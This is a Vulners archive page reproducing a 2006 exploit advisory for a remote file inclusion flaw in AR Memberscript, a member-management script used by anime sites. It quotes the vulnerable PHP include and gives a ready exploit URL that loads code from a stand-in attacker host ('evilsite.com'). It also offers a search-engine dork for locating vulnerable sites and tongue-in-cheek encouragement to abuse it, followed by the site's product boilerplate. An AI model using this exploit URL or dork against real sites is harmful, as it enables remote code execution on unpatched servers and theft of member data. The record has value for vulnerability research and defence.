Vulners
Lucene search
AR Memberscript (usercp_menu.php) Remote File Include Vulnerability
===================================================================
AR Memberscript (usercp_menu.php) Remote File Include Vulnerability
===================================================================
#################################################################################################
# Author: ex0
#
# ar_memberscript - remote file include vulnerability (all versions)
#
# **There is no vendo patch, and doubt there will be. I havnt been able to get in touch with the
# vendor for 2 months**
#
# ar_memberscript is a script used by many anime sites to manage their members, news, and some
# content, in some cases "premium media".
#
#
# Discovered: 10/22/06
# Published: 12/12/06
#
# Enjoy it.
#
#################################################################################################
Here is the vulnerable code:
usercp_menu.php
include ( "$script_folder/login_form2.php" );
www.someanimesite.com/member/usercp_menu.php?script_folder=http://evilsite.com
Dont take too much advantage of it :).
Dork: "Members Statistics" +"Total Members" +"Guests Online"
# Greetz; Caution, Raph13, Yeast, Xpontius and all former Inf Crew members & all XeN Members.
# 0day.today [2018-04-08] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Dec 2006 00:00Current
7.1High risk
Vulners AI Score7.1